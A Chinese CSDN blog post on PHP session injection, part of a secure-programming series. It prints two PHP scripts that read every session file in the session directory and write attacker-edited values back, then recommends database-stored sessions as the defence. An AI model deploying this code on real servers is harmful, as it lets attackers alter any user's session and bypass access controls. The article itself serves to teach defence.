PHP安全编程:会话数据注入

最新推荐文章于 2023-06-12 16:52:28 发布
最新推荐文章于 2023-06-12 16:52:28 发布
阅读量1.1k 收藏
点赞数
分类专栏: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liangpz521/article/details/39121495
版权

一个与会话暴露类似的问题是会话注入。此类攻击是基于你的WEB服务器除了对会话存储目录有读取权限外,还有写入权限。因此,存在着编写一段允许其他用户添加,编辑或删除会话的脚本的可能。下例显示了一个允许用户方便地编辑已存在的会话数据的HTML表单:

<?php

session_start();

?>

<form action="inject.php" method="POST">

<?php

$path = ini_get('session.save_path');
$handle = dir($path);

while ($filename = $handle->read())
{
  if (substr($filename, 0, 5) == 'sess_')
  {
    $sess_data = file_get_contents("$path/$filename");

    if (!empty($sess_data))
    {
      session_decode($sess_data);
      $sess_data = $_SESSION;
      $_SESSION = array();

      $sess_name = substr($filename, 5);
      $sess_name = htmlentities($sess_name, ENT_QUOTES, 'UTF-8');
      echo "<h1>Session [$sess_name]</h1>";

      foreach ($sess_data as $name => $value)
      {
        $name = htmlentities($name, ENT_QUOTES, 'UTF-8');
        $value = htmlentities($value, ENT_QUOTES, 'UTF-8');
        echo "<p>
              $name:
              <input type=\"text\"
              name=\"{$sess_name}[{$name}]\"
              value=\"$value\" />
              </p>";
      }

      echo '<br />';
    }
  }
}

$handle->close();

?>

<input type="submit" />
</form>

脚本inject.php执行由表单所指定的修改: 


<?php

session_start();

$path = ini_get('session.save_path');

foreach ($_POST as $sess_name => $sess_data)
{
  $_SESSION = $sess_data;
  $sess_data = session_encode;

  file_put_contents("$path/$sess_name", $sess_data);
}

$_SESSION = array();

?>

此类攻击非常危险。攻击者不仅可以编辑你的用户的数据,还可以编辑他自己的会话数据。它比会话劫持更为强大,因为攻击者能选择所有的会话数据进行修改,从而使绕过访问限制和其他安全手段成为可能。

针对这个问题的最好解决方案是将会话数据保存在数据库中。参见专题前面的内容。

延伸阅读

此文章所在专题列表如下:http://www.nowamagic.net/librarys/veda/detail/2079



liangpz521
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
编程语言+PHP+动态网页+安全防护
03-01
编程语言+PHP+动态网页+安全防护**:这是一个关于PHP编程语言的动态网页的安全防护的资源,适合有一定PHP基础的开发者。它介绍了PHP的特点、优势、劣势和应用领域,以及如何使用PHP来开发动态网页,包括表单、文件、...
渗透测试---手把手教你SQL注入(5)---Cookie注入,宽字节注入与堆叠注入
最新发布
weixin_52796034的博客
10-13 374
在SQL注入中,尤其是使用ASP的网站中,Cookie注入是一种常见的攻击方式。Cookie是Web应用程序在客户端计算机上存储的小型数据片段,用于跟踪用户会话状态和存储其他个性化信息。有时我们可以通过在Cookie中注入恶意代码来绕过一些安全措施,并执行恶意的SQL查询。
WEB安全(客户端XSS和会话注入)(前端面试)
qq_44786519的博客
09-15 258
WEB基本攻击大致可以分为三大类—— “资源枚举”、“参数操纵” 和 “其它攻击”。 资源枚举 日常开发中都会用约定俗称的去做某件事,文件命名就是这样,比如用骆驼命名来命名函数名,目的是为了团队开发工作更加规范.但是成为习惯的文件命名方式,也更容易让其他人更方便的找他想找的文件 参数操纵 对于客户端的攻击就是XXS和会话劫持 XSS(跨域脚本攻击)也是最常见的web攻击 重点就是客户端执行. 举个例子,在搜索框搜索东西的时候 在搜索框搜索内容,填入,点击搜索. 如果前端页面没有对返回的数据进行过滤,直接显示
远程线程注入之突破Session0隔离会话
xf555er的博客
06-12 1064
当我们使用远程线程注入将dll注入至系统服务进程中往往会失败,这是因为大多数系统服务都是在Session0中运行的 "Session 0"是Windows操作系统中的一个特殊的会话,专门用于运行系统服务和其他在用户登录之前就需要运行的程序。从Windows Vista和Windows Server 2008开始,为了提高安全性,Windows将用户和系统服务分隔在不同的会话中。具体来说,所有的服务和系统任务都在Session 0中运行,而所有用户交互任务都在其他会话中运行
会话数据 暴露 注入
09-01 101
会话数据暴露 当你关注于防止源码的暴露时,你的会话数据只同样存在着风险。在默认情况下,SESSION保存在/tmp目录下。这样做在很多情形下是很方便的,其中之一是所有用户都有对/tmp的写入权限,这样Apache同样也有权限进行写入。虽然其他用户不能直接从shell环境读取这些会话文件,但他们可以写一个简单的脚本来进行读取: <?php header...
Natas Wargame Level20 Writeup(会话状态注入/篡改)
a_18067的博客
05-20 140
sourcecode核心代码: 1 <? 2 3 function debug($msg) { 4 if(array_key_exists("debug", $_GET)) { 5 print "DEBUG: $msg<br>"; 6 } 7 } 8 9 functi...
关于PHP安全编程的使用技巧
01-31
介绍关于PHP安全编程的相关知识: 包括SQL注入、表单与URL安全、验证与授权、会话与cookie、文件及命令等~
PHPSL:尝试为PHP创建一致的标准库
03-17
文件和目录检查文件或目录创建文件/目录复制文件/目录移动文件/目录删除文件/目录D B 连接到数据库执行查询从数据库获取数据正则表达式安全CSRF字段智威汤逊XSS SQL注入会话劫持获取URL查询字符串获取POST内容?...
Codeigniter利用加密Key(密钥)的对象注入漏洞
01-30
今天,我决定来分析一下Codeigniter的PHP对象注入漏洞。我在接下来的叙述中会把重点放在Codeigniter的Session会话机制上。所有我将会分析的method方法都在CodeIgniter/system/libraries/Session.php文件里。我在本...
PHP和MySQL Web开发第4版pdf以及源码
10-13
第13章 MySQL高级编程 13.1 LOAD DATA INFILE语句 13.2 存储引擎 13.3 事务 13.3.1 理解事务的定义 13.3.2 通过InnoDB使用事务 13.4 外键 13.5 存储过程 13.5.1 基本示例 13.5.2 局部变量 13.5.3 游标和...
PHP安全编程session劫持的防御session 数据暴露
zwcwu31的专栏
03-10 1675
session 数据暴露 会话数据常会包含一些个人信息和其它敏感数据。基于这个原因,会话数据的暴露是被普遍关心的问题。一般来说,暴露的范围不会很大,因为会话数据是保存在服务器环境中的,而不是在数据库或文件系统中。因此,会话数据自然不会公开暴露。 使用SSL是一种特别有效的手段,它可以使数据在服务器和客户端之间传送时暴露的可能性降到最低。这对于传送敏感数据的应用来说非常重要。SSL在HTTP
PHP漏洞全解(七)-Session劫持
zacklin的专栏
04-16 1505
服务端和客户端之间是通过session(会话)来连接沟通。当客户端的浏览器连接到服务器后,服务器就会建立一个该用户的session。每个用户的session都是独立的,并且由服务器来维护。每个用户的session是由一个独特的字符串来识别,成为session id。用户发出请求时,所发送的http表头内包含session id 的值。服务器使用http表头内的session id来识别时哪个用户提
php sql注入 session,PHP 关于SQL注入的防范措施。
weixin_39873325的博客
03-16 116
最近在使用框架的时候还是有点不安,不知道框架的设计者有没有考虑到SQL-Injection的问题,我在顶层需不需要做一些必要的过滤等等,由此我特意的去StackOverflow看了下,真是获益良多,然后我去看了下框架的DB库的内部方法,然后就比较安心了。分享下国内外PHP程序员在处理SQL-Injection的一些方案。国外普遍都推荐,只要你是使用查询都应该做到两点:1.prepared stat...
php注入实例
05-03 296
php注入实例 在网上很难看到一篇完整的关于php注入的文章和利用代码,于是我自已把mysql和php硬啃了几个星期,下面说说我的休会吧,希望能抛砖引玉! 相信大家对asp的注入已经是十分熟悉了,而对php注入比asp要困难,因为php的magic_gpc选项确实让人头疼,在注入中不要出现引号,而 php大多和mysql结合,而mysql的功能上的缺点,从另外一人角度看确在一定...
php注入教程,php注入实例
weixin_39972777的博客
03-10 190
php注入实例发布时间:2016-06-17 来源: 点击:次php注入实例在网上很难看到一篇完整的关于php注入的文章和利用代码,于是我自已把mysql和php硬啃了几个星期,下面说说我的休会吧,希望能抛砖引玉!相信大家对asp的注入已经是十分熟悉了,而对php注入比asp要困难,因为php的magic_gpc选项确实让人头疼,在注入中不要出现引号,而php大多和mysql结合,而my...
原理+实践学习(PHP反序列化和Session反序列化)
Lemon's blog
05-04 3012
前言:PHP反序列化也是web安全中常见的一种漏洞,这次就先来大致了解一下PHP反序列化漏洞。 一、PHP序列化和反序列化 在学习PHP反序列化漏洞时,先来了解一下基础的知识。 (一)PHP序列化 函数 : serialize() 所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。 序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的...
php sql注入 session,dedecms SESSION变量覆盖导致SQL注入
weixin_39868034的博客
03-16 131
漏洞名称:dedecms SESSION变量覆盖导致SQL注入危险等级:★★★★★(高危)漏洞文件:/include/common.inc.php披露时间:2016-07-14漏洞描述:dedecms的/plus/advancedsearch.php中,直接从$_SESSION[$sqlhash]获取值作为$query带入SQL查询,这个漏洞的利用前提是session.auto_start = 1...
php sql注入 session,[PwnThyBytes 2019]Baby_SQL(session+sql注入)
weixin_39874350的博客
03-16 355
source.zip得到源码。开始审计在index.php中。对所有输入进行了addslashes转义。在login.php中!isset($_SESSION) AND die("Direct access on this script is not allowed!");include 'db.php';$sql = 'SELECT `username`,`password` FROM `ptb...
playwright 出现异常:java.lang.IllegalStateException:getAttribute: 会话已失效
05-10
这个异常通常是因为你使用了已经失效的会话。在 Playwright 中,会话可以由浏览器、页面或上下文创建。当会话关闭或浏览器、页面或上下文被销毁时,会话就会失效。 解决办法有以下几种: 1. 确保你在使用会话之前...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值